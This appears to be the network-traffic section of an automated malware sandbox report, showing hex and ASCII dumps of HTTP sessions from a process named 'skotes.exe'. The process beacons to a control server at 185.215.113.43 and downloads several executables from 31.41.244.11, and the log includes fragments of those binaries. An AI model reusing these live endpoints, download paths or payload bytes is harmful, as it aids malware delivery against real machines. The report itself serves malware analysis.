                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.329077959 CET448INData Raw: 30 6a 01 e8 4f f4 ff ff 6a 12 8b f8 e8 46 f4 ff ff 0f b7 08 f7 d9 1b c9 23 c8 0f b7 07 f7 d8 51 1b c0 23 c7 50 ff 75 08 ff 75 cc ff 15 a4 92 40 00 89 45 f8 39 5d d4 0f 8c a1 10 00 00 ff 75 f8 e9 93 10 00 00 33 c9 e8 f5 f3 ff ff 50 ff 15 6c 92 40
                                                                                                                                                                                                                                                                          Data Ascii: 0jOjF#Q#Puu@E9]u3Pl@sUjY3PAPp@ZGPj3Pt@DQup@EPV@EEjPEEPSSPSx@PShrV@;PD@
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.329093933 CET1236INData Raw: 22 8b d8 e8 8f f2 ff ff 6a 15 8b f8 e8 86 f2 ff ff 68 f0 00 41 00 6a ec e8 bc 2d 00 00 0f b7 07 ff 75 e0 f7 d8 1b c0 23 c7 68 b0 70 4d 00 50 0f b7 06 f7 d8 1b c0 53 23 c6 50 ff 75 f4 ff 15 88 91 40 00 83 f8 21 7d 16 50 57 53 56 68 40 99 40 00 e8
                                                                                                                                                                                                                                                                          Data Ascii: "jhAj-u#hpMPS#Pu@!}PWSVh@@@WSVh@@SVh@@YYVjI-V:EV;t_h@b@YY9]tF5(@j@jdu=tEPu,@9]|uW<9]tE
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.329211950 CET1236INData Raw: 53 6a f9 e8 fd 28 00 00 e9 6d f3 ff ff 8b 45 f4 56 89 45 a4 c7 45 a8 02 00 00 00 e8 92 39 00 00 33 c9 57 66 89 4c 46 02 e8 85 39 00 00 33 c9 66 89 4c 47 02 8b 45 08 66 8b 4d dc 50 53 89 75 ac 89 7d b0 89 45 be 66 89 4d b4 e8 b6 28 00 00 8d 45 a4
                                                                                                                                                                                                                                                                          Data Ascii: Sj(mEVEE93WfLF93fLGEfMPSu}EfM(EP@tGh@AV]]]9V@AW89]tSE9]tjE9]tj"EjSWVh@h@P;Suuu
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.329226971 CET448INData Raw: 91 40 00 66 39 1e 74 1e 53 8d 4d bc 51 50 ff 75 08 56 e8 12 34 00 00 50 ff 15 54 91 40 00 85 c0 0f 85 f1 f7 ff ff c7 45 fc 01 00 00 00 e9 e5 f7 ff ff 6a 02 59 e8 9f e8 ff ff 89 45 f8 83 f8 01 0f 8c 30 05 00 00 b9 03 20 00 00 3b c1 7e 03 89 4d f8
                                                                                                                                                                                                                                                                          Data Ascii: @f9tSMQPuV4PT@EjYE0 ;~Mf9V]3E9]SEPjEPuX@}u|9]u9jEPjEPSS\@E<t.<t*fEfwEFE:tE;u|>EPW33:Et}t}u
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.329339981 CET1236INData Raw: 0f 84 4a ff ff ff 83 7d ec 02 0f 85 40 ff ff ff 39 5d e0 75 30 66 83 7d cc 0d 74 32 66 83 7d cc 0a 74 2b 66 8b 45 08 0f b7 c8 66 89 04 77 46 89 4d cc 66 3b c3 0f 84 15 ff ff ff 3b 75 f8 7c aa e9 0b ff ff ff 0f b7 45 08 e9 c8 fe ff ff 66 8b 45 08
                                                                                                                                                                                                                                                                          Data Ascii: J}@9]u0f}t2f}t+fEfwFMf;;u|EfEf9EtffjSjf97uSjYPV1P`@9]PWf9V1Pd@f9TPW1Ph@+j=
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.448837042 CET1236INData Raw: 2f 40 00 49 30 40 00 e3 30 40 00 e3 30 40 00 a9 30 40 00 cf 30 40 00 32 1e 40 00 36 1e 40 00 3a 1e 40 00 3f 1e 40 00 55 1e 40 00 59 1e 40 00 5d 1e 40 00 61 1e 40 00 6c 1e 40 00 79 1e 40 00 81 1e 40 00 8e 1e 40 00 92 1e 40 00 55 8b ec 81 ec 80 00
                                                                                                                                                                                                                                                                          Data Ascii: /@I0@0@0@0@0@2@6@:@?@U@Y@]@a@l@y@@@@U}ujhju4@E}uLtB8C;|PjdQP@PEh@PH@EPu8@EPhu)3V39t$tpB;tP,@5pB^9


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          5192.168.2.549871185.215.113.43802672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:27.424300909 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                                          Content-Length: 31
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Data Raw: 64 31 3d 31 30 31 38 39 36 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                          Data Ascii: d1=1018968001&unit=246122658369
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:28.782670975 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:14:28 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          6192.168.2.54987331.41.244.11802672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:28.915137053 CET65OUTGET /files/Krokodyl02/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                          Host: 31.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.236027002 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:14:30 GMT
                                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                          Content-Length: 1863680
                                                                                                                                                                                                                                                                          Last-Modified: Fri, 20 Dec 2024 13:47:02 GMT
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          ETag: "67657556-1c7000"
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ae 00 00 00 00 00 00 00 70 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 49 00 00 04 00 00 32 fc 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL<_gpI@I2@T0h 1 H@.rsrc X@.idata 0Z@ 0*@\@lzigcvvjp/^@pdsqmwos`IJ@.taggant0pI"N@
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.236043930 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.236059904 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.236077070 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.236103058 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.236119986 CET672INData Raw: 84 e6 96 fc b3 ce 95 ed c1 7a c8 e9 e3 9f 77 3d dd fe aa 0b 89 8e cf ed d2 45 15 4a 2e 20 1f a0 47 53 4f 15 cc 5b 7c 23 21 5f f6 81 89 6a b1 0f 89 3c 24 33 45 b8 bf 71 09 50 7c d6 c7 d7 de e5 61 44 12 a5 42 08 ea c4 c2 91 ad 25 7b 06 6a 37 60 f0
                                                                                                                                                                                                                                                                          Data Ascii: zw=EJ. GSO[|#!_j<$3EqP|aDB%{j7`rjS!PL9X=Q8UDd!QAR<|JzzshtX FbhEq ^'14=&+{d'+h<YW2Qa4<<!#wL8F
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.236273050 CET1236INData Raw: 71 89 15 2b 53 ea 57 7b de 4e cc 02 a0 b0 54 33 0c 46 5e 06 3a 5d 9e a9 39 e2 43 62 4f 64 88 de 08 06 ff 36 25 7e 58 49 c2 69 20 1b 49 76 b9 25 f7 ea a7 b9 89 4a 58 47 c5 12 35 de b7 6a 47 0c 5d 75 b8 91 ba 8e 43 4a 59 7f 7e 17 8c 72 eb db 03 de
                                                                                                                                                                                                                                                                          Data Ascii: q+SW{NT3F^:]9CbOd6%~XIi Iv%JXG5jG]uCJY~rilKYA-6?K(7~@-&4O)=V1q+HtB}>uS\~a`kMqIu0:4OAhLoIWn)2?CALF5,B"k&n&X1l]sK
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.236355066 CET224INData Raw: 4b 1e c4 8d f8 4f 0c 73 50 56 ff ee 19 92 38 92 2e 0f 7a 44 14 8f 5f 65 7e 0d 43 03 86 81 d3 05 f2 6e 68 8d 57 59 5a ff bd 3d d9 8e 51 99 54 94 c0 63 77 8c 9c e6 4f 72 5b e9 5d 27 18 74 4c fc cb 2a 34 d2 77 0c b3 94 4d 45 2d 23 53 2f 48 da 48 69
                                                                                                                                                                                                                                                                          Data Ascii: KOsPV8.zD_e~CnhWYZ=QTcwOr[]'tL*4wME-#S/HHiEYN05b;J{9&74\Q}.0| x%8~8mJbaYi;1)bPu{>$b\Q<;}TQ>5:%A9MK
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.236368895 CET1236INData Raw: c7 96 61 9a 7f 82 7d 74 13 39 34 0b 35 46 7c 10 bb 71 de 92 45 4c d5 5d ff e0 20 88 fb 00 cc 2f 0a 4b 8b 31 70 10 b7 43 9a c3 2d b5 92 d4 42 36 f3 48 b2 5e 43 dd 7a da 8d f2 e8 6c 55 c5 1e 1d 65 68 cd e9 3b 71 e3 19 9f 81 0b 10 ca 5b 2e 2c 36 3e
                                                                                                                                                                                                                                                                          Data Ascii: a}t945F|qEL] /K1pC-B6H^CzlUeh;q[.,6>GF:+U`^s`yv7PPr)qjyg7K"t2>[O~EE.+qC+:sr:,kT!PoS<=qS3Pnc<UK(K1"Uvt_S
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.236383915 CET1236INData Raw: 4b 73 fb 04 7b 98 6b 59 ae d4 07 31 de 4c 58 fb 3a de 34 93 2e f6 20 94 53 83 3a da 7c 19 c2 a4 9d ef 7d 41 1b fa ca e8 14 87 92 0c 47 80 dd 1b ff de 3b 3b b8 91 b1 ac 6a 91 12 43 d9 42 04 ed b9 46 5d 01 82 29 50 a3 3a 94 6b 35 c0 4c 80 94 ff 3e
                                                                                                                                                                                                                                                                          Data Ascii: Ks{kY1LX:4. S:|}AG;;jCBF])P:k5L>QC.WVrg)uj|\`1K4@CqI{S1ma|b%{5FMqX\h6H!rCpJ"7DK3oat&,y7i,"VAw5A2d}
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:30.355772018 CET1236INData Raw: 6d 5b d2 ac 01 0f 2d 6c f2 49 16 19 ea dc 3f 4c 32 05 74 b2 0c d0 4e 2b cb ec 7b f7 d3 4c 09 cf 37 90 d4 32 57 4e a9 92 38 c5 1e 80 77 87 e8 d7 1b f9 1f 7b 85 7e 10 29 03 35 5e 9c fc b8 5e 27 0f ad 5f 25 89 67 f8 b6 ee 2a ab cd 5a 28 e0 71 a5 e9
                                                                                                                                                                                                                                                                          Data Ascii: m[-lI?L2tN+{L72WN8w{~)5^^'_%g*Z(qh"'95pH>BiaDpaPxG)V>U0\G>cU~C8-(Y)$\UBA,+{;ng4h3Y0}3S:_MC"5


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          7192.168.2.549889185.215.113.43802672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:35.838126898 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                                          Content-Length: 31
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Data Raw: 64 31 3d 31 30 31 38 39 36 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                          Data Ascii: d1=1018969001&unit=246122658369
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:37.156979084 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:14:36 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          8192.168.2.54989331.41.244.11802672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:37.650927067 CET59OUTGET /files/fate/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                          Host: 31.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:38.978585958 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:14:38 GMT
                                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                          Content-Length: 776832
                                                                                                                                                                                                                                                                          Last-Modified: Tue, 17 Dec 2024 09:45:14 GMT
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          ETag: "6761482a-bda80"
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 09 00 a3 1e 60 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 aa 01 00 00 c0 00 00 00 00 00 00 52 59 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 0c 00 00 08 00 00 00 00 00 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 37 02 00 3c 00 00 00 00 a0 02 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 ac 0b 00 80 2e 00 00 00 b0 02 00 40 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fe 01 00 18 00 00 00 e8 cd 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 28 39 [TRUNCATED]
                                                                                                                                                                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL`g"RY@@7<.@X(9T.text `.rdata$@@.datal"P>@.bsSST `.tlsV@.rsrcX@@.reloc@Z@B.bsst@.bssp@
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:38.978616953 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:38.978630066 CET1236INData Raw: ec 30 8b 5c 24 44 a1 c0 57 42 00 31 e0 89 44 24 2c 8b 43 3c 8b 6c 18 78 8b 44 1d 18 85 c0 0f 84 4f 01 00 00 8b 4c 1d 20 01 d9 89 4c 24 08 48 89 44 24 10 c7 04 24 00 00 00 00 89 5c 24 04 89 6c 24 0c 8b 44 24 08 8b 30 01 de 0f 57 c0 f2 0f 11 44 24
                                                                                                                                                                                                                                                                          Data Ascii: 0\$DWB1D$,C<lxDOL L$HD$$\$l$D$0WD$$WD$V(w"|$$D$(WVt$VfSCErPPD$|$$l$(WVPe\$Dl$t$h5Vm
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:38.978735924 CET1236INData Raw: f0 68 6d 64 85 93 ff 35 6c 64 42 00 e8 16 fb ff ff 83 c4 08 89 45 e4 8b 55 e4 ff d2 bb 49 05 00 00 be 11 50 42 00 6a 11 68 00 50 42 00 53 56 e8 96 fc ff ff 83 c4 10 6a 0a 68 00 c0 41 00 57 8b 7d 08 57 e8 82 fc ff ff 83 c4 10 68 01 dc af 8a ff 35
                                                                                                                                                                                                                                                                          Data Ascii: hmd5ldBEUIPBjhPBSVjhAW}Wh5ldBMQj@SVuM11^_[]}uVPB'jT9BUSWV,\$@WB1D$(d=0w@ldBhb-/5ldBE(AD$
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:38.978818893 CET896INData Raw: 42 00 31 e0 89 44 24 08 8b 01 8b 40 04 8b 7c 01 38 85 ff 74 48 89 e3 89 d9 56 e8 1a ff ff ff 80 7b 04 00 74 31 8b 07 89 f9 ff 50 34 83 f8 ff 0f 94 c0 8b 0e 8b 51 04 8d 0c 16 83 7c 16 38 00 0f 94 c4 08 c4 0f b6 c4 c1 e0 02 0b 44 16 0c 6a 00 50 e8
                                                                                                                                                                                                                                                                          Data Ascii: B1D$@|8tHV{t1P4Q|8DjPnL$1^_[WV D$,WB1T$A#AuL$1 ^_|$0t1PP?BBDBD@Bt$RWhABV?
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:38.978832006 CET1236INData Raw: c2 08 00 e8 93 fa ff ff cc 8b 44 24 04 8b 54 24 08 89 10 89 48 04 c2 08 00 8b 44 24 04 8b 10 8b 40 04 8b 49 04 33 48 04 33 54 24 08 09 ca 0f 94 c0 c2 08 00 cc 53 57 56 83 ec 0c 8b 74 24 20 8b 44 24 1c 8b 15 c0 57 42 00 31 e2 89 54 24 08 8b 11 89
                                                                                                                                                                                                                                                                          Data Ascii: D$T$HD$@I3H3T$SWVt$ D$WB1T$PWROVI3J3L$1^_[USWVWB1D$WD$W$t$8l$4\$0wx@Wt$<PXQ
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:38.978842020 CET1236INData Raw: 01 fb 8b 74 24 20 56 ff 74 24 20 53 e8 96 54 00 00 83 c4 0c c6 04 1e 00 89 7d 00 89 e8 83 c4 08 5e 5f 5b 5d c2 08 00 89 f8 83 c8 0f 01 d1 39 c8 89 ce 0f 47 f0 89 f0 40 75 0a 31 c0 31 f6 4e e9 13 ff ff ff 3d 00 10 00 00 0f 83 fb fe ff ff 50 e8 64
                                                                                                                                                                                                                                                                          Data Ascii: t$ Vt$ ST}^_[]9G@u11N=PdhkV@|u.Dt%L8P4u@DjP}^WVWB1D$V&t!@L8D$Pf1HT
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:38.978854895 CET1236INData Raw: 57 56 8b 5c 24 14 8b 74 24 10 39 de 74 1b 89 cf 83 c7 08 0f b6 06 57 50 e8 f6 21 00 00 83 c4 08 88 06 46 39 de 75 ec 89 de 89 f0 5e 5f 5b c2 08 00 0f b6 44 24 04 83 c1 08 51 50 e8 d3 21 00 00 83 c4 08 c2 04 00 cc 56 8b 44 24 08 8b 74 24 0c 89 f1
                                                                                                                                                                                                                                                                          Data Ascii: WV\$t$9tWP!F9u^_[D$QP!VD$t$)QPt$tO^D$VD$t$)QPt$JO^D$Vy~vxv^FtPVD$(A1VVQP78
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:38.979165077 CET1236INData Raw: 7d 00 00 59 85 c0 75 0f 68 ac 64 42 00 e8 d8 7d 00 00 59 85 c0 74 2b 32 c0 eb 30 83 c9 ff 89 0d a0 64 42 00 89 0d a4 64 42 00 89 0d a8 64 42 00 89 0d ac 64 42 00 89 0d b0 64 42 00 89 0d b4 64 42 00 c6 05 9d 64 42 00 01 b0 01 5e 5d c3 6a 05 e8 8a
                                                                                                                                                                                                                                                                          Data Ascii: }YuhdB}Yt+20dBdBdBdBdBdBdB^]j#UEVH<AQAk(J9MrB9Er(;u3^]UEVu}kdBP$Y^]x}kdBP$Y3W@
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:38.979176998 CET896INData Raw: ac 65 42 00 e8 ad ff ff ff 83 25 ac 65 42 00 00 59 8d 4d fc e8 dc fb ff ff c9 c3 55 8b ec 8b 4d 08 b8 d8 c8 41 00 39 08 74 11 83 c0 08 3d 50 cb 41 00 75 f2 b8 24 07 42 00 5d c3 8b 40 04 5d c3 55 8b ec 51 51 8b 45 08 56 8b f1 89 45 f8 8d 45 f8 c6
                                                                                                                                                                                                                                                                          Data Ascii: eB%eBYMUMA9t=PAu$B]@]UQQEVEEEV(A"bRP/YY^aaABAA(API/YUMhBBEP(UMuwhBBEP(UMuhCBE
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:39.098314047 CET1236INData Raw: 85 c9 74 0b 8b 41 18 85 c0 75 09 8d 41 1c c3 b8 53 03 42 00 c3 56 57 8b f9 8b 07 8b 70 0c 8b ce ff 15 10 37 42 00 8b cf ff d6 5f 5e c3 33 c0 40 c3 33 c0 c7 01 6c cb 41 00 89 41 08 89 41 0c 89 41 10 89 41 14 89 41 18 89 41 1c 89 41 20 89 41 24 89
                                                                                                                                                                                                                                                                          Data Ascii: tAuASBVWp7B_^3@3lAAAAAAAA A$A(A,A0jA3FSS^0^^F^^ ^$^(^,jYtj]YG~0UjhAdPVWB3PEdeV


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          9192.168.2.549906185.215.113.43802672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:43.036757946 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                                          Content-Length: 31
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Data Raw: 64 31 3d 31 30 31 38 39 37 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                          Data Ascii: d1=1018970001&unit=246122658369
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:44.359936953 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:14:44 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          10192.168.2.54991031.41.244.11802672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:44.780916929 CET61OUTGET /files/martin/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                          Host: 31.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:45.886986971 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:14:45 GMT
                                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                          Content-Length: 4453888
                                                                                                                                                                                                                                                                          Last-Modified: Fri, 20 Dec 2024 23:24:22 GMT
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          ETag: "6765fca6-43f600"
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
